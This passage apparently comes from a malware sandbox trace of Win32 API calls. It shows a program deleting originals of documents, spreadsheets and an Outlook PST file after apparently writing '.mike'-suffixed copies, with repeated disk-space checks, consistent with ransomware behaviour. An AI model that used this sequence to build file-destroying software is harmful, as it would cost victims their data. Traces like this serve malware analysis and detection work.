(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\h-K_HDxTPYr y4.ots", dwFileAttributes=0x80) returned 1 [0153.782] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\h-K_HDxTPYr y4.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\p0baprkwz29ruwfh\\h-k_hdxtpyr y4.ots")) returned 1 [0153.786] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0153.791] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\NMtpO.ots", dwFileAttributes=0x80) returned 1 [0153.792] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\NMtpO.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\p0baprkwz29ruwfh\\nmtpo.ots")) returned 1 [0153.794] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0153.799] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\QnhVGbT.pdf.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\QnhVGbT.pdf.mike", lpFilePart=0x0) returned 0x64 [0153.804] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\QnhVGbT.pdf", dwFileAttributes=0x80) returned 1 [0153.804] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\QnhVGbT.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\p0baprkwz29ruwfh\\qnhvgbt.pdf")) returned 1 [0153.808] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0153.813] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\wJFWMC2Th.doc", dwFileAttributes=0x80) returned 1 [0153.813] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\wJFWMC2Th.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\p0baprkwz29ruwfh\\wjfwmc2th.doc")) returned 1 [0153.816] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0153.824] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\yX4J4Rf9QFu.xlsx", dwFileAttributes=0x80) returned 1 [0153.824] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\yX4J4Rf9QFu.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\p0baprkwz29ruwfh\\yx4j4rf9qfu.xlsx")) returned 1 [0153.831] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0153.832] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.832] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.832] CoTaskMemFree (pv=0x508980) [0153.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.835] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0153.835] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0153.840] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\0UfqQAZUiJ\\-xAanFEPdy.ods", dwFileAttributes=0x80) returned 1 [0153.840] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\0UfqQAZUiJ\\-xAanFEPdy.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\p0baprkwz29ruwfh\\0ufqqazuij\\-xaanfepdy.ods")) returned 1 [0153.843] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0153.853] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\0UfqQAZUiJ\\lHvtd.doc", dwFileAttributes=0x80) returned 1 [0153.853] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\0UfqQAZUiJ\\lHvtd.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\p0baprkwz29ruwfh\\0ufqqazuij\\lhvtd.doc")) returned 1 [0153.857] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0153.866] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\0UfqQAZUiJ\\TKHuy.docx", dwFileAttributes=0x80) returned 1 [0153.867] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\0UfqQAZUiJ\\TKHuy.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\p0baprkwz29ruwfh\\0ufqqazuij\\tkhuy.docx")) returned 1 [0153.870] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0153.876] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\0UfqQAZUiJ\\zm6KG6jG4BjhumSNNOz.ods.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\0UfqQAZUiJ\\zm6KG6jG4BjhumSNNOz.ods.mike", lpFilePart=0x0) returned 0x7b [0153.880] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\0UfqQAZUiJ\\zm6KG6jG4BjhumSNNOz.ods", dwFileAttributes=0x80) returned 1 [0153.880] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\0UfqQAZUiJ\\zm6KG6jG4BjhumSNNOz.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\p0baprkwz29ruwfh\\0ufqqazuij\\zm6kg6jg4bjhumsnnoz.ods")) returned 1 [0153.888] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.888] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.888] CoTaskMemFree (pv=0x508980) [0153.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.889] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0153.896] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\DAyjxOXEDc2vddOfQDII\\FAyx68rMZymIQpM7.xlsx", dwFileAttributes=0x80) returned 1 [0153.897] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\DAyjxOXEDc2vddOfQDII\\FAyx68rMZymIQpM7.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\p0baprkwz29ruwfh\\dayjxoxedc2vddofqdii\\fayx68rmzymiqpm7.xlsx")) returned 1 [0153.900] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0153.906] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\DAyjxOXEDc2vddOfQDII\\VRc0vG4L.pptx", dwFileAttributes=0x80) returned 1 [0153.907] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\DAyjxOXEDc2vddOfQDII\\VRc0vG4L.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\p0baprkwz29ruwfh\\dayjxoxedc2vddofqdii\\vrc0vg4l.pptx")) returned 1 [0153.910] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0153.915] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\DAyjxOXEDc2vddOfQDII\\yEnZ2ZSRdLcOQzDKRLd.doc", dwFileAttributes=0x80) returned 1 [0153.915] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bkazxn-tWvb\\p7umu3_O9Pn5HB\\p0baPrKWZ29RuwFH\\DAyjxOXEDc2vddOfQDII\\yEnZ2ZSRdLcOQzDKRLd.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bkazxn-twvb\\p7umu3_o9pn5hb\\p0baprkwz29ruwfh\\dayjxoxedc2vddofqdii\\yenz2zsrdlcoqzdkrld.doc")) returned 1 [0153.918] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.918] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.918] CoTaskMemFree (pv=0x508980) [0153.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.920] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.920] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.920] CoTaskMemFree (pv=0x508980) [0153.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.921] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.921] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.922] CoTaskMemFree (pv=0x508980) [0153.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.922] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.922] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.923] CoTaskMemFree (pv=0x508980) [0153.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.923] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.923] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.923] CoTaskMemFree (pv=0x508980) [0153.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.925] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.925] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.925] CoTaskMemFree (pv=0x508980) [0153.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.926] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0153.944] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.mike", lpFilePart=0x0) returned 0x51 [0153.950] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", dwFileAttributes=0x80) returned 1 [0153.950] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpFilePart=0x0) returned 0x4c [0153.950] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst")) returned 1 [0153.953] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpFilePart=0x0) returned 0x4c [0153.954] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.954] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.954] CoTaskMemFree (pv=0x508980) [0153.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.955] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0153.964] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\hLStynB7c2W.doc", dwFileAttributes=0x80) returned 1 [0153.964] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\hLStynB7c2W.doc", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\hLStynB7c2W.doc", lpFilePart=0x0) returned 0x4a [0153.964] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\hLStynB7c2W.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xa37wzpor7yjcif8nu\\hlstynb7c2w.doc")) returned 1 [0153.966] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\hLStynB7c2W.doc", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\hLStynB7c2W.doc", lpFilePart=0x0) returned 0x4a [0153.968] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0153.973] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\mD6f.xls", dwFileAttributes=0x80) returned 1 [0153.974] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\mD6f.xls", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\mD6f.xls", lpFilePart=0x0) returned 0x43 [0153.974] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\mD6f.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xa37wzpor7yjcif8nu\\md6f.xls")) returned 1 [0153.975] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\mD6f.xls", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\mD6f.xls", lpFilePart=0x0) returned 0x43 [0153.977] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0153.982] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\s0HIrW0y_Rv2.rtf", dwFileAttributes=0x80) returned 1 [0153.983] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\s0HIrW0y_Rv2.rtf", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\s0HIrW0y_Rv2.rtf", lpFilePart=0x0) returned 0x4b [0153.983] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\s0HIrW0y_Rv2.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xa37wzpor7yjcif8nu\\s0hirw0y_rv2.rtf")) returned 1 [0153.984] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\s0HIrW0y_Rv2.rtf", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\s0HIrW0y_Rv2.rtf", lpFilePart=0x0) returned 0x4b [0153.986] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0153.991] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\y-3PV.pdf", dwFileAttributes=0x80) returned 1 [0153.991] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\y-3PV.pdf", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\y-3PV.pdf", lpFilePart=0x0) returned 0x44 [0153.991] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\y-3PV.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xa37wzpor7yjcif8nu\\y-3pv.pdf")) returned 1 [0153.993] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\y-3PV.pdf", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xA37wZPor7yjciF8Nu\\y-3PV.pdf", lpFilePart=0x0) returned 0x44 [0153.994] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.994] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.994] CoTaskMemFree (pv=0x508980) [0153.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.995] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.995] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.995] CoTaskMemFree (pv=0x508980) [0153.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.996] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.996] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.996] CoTaskMemFree (pv=0x508980) [0153.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.996] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.996] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.996] CoTaskMemFree (pv=0x508980) [0153.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.000] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0154.000] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0154.000] CoTaskMemFree (pv=0x508980) [0154.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: 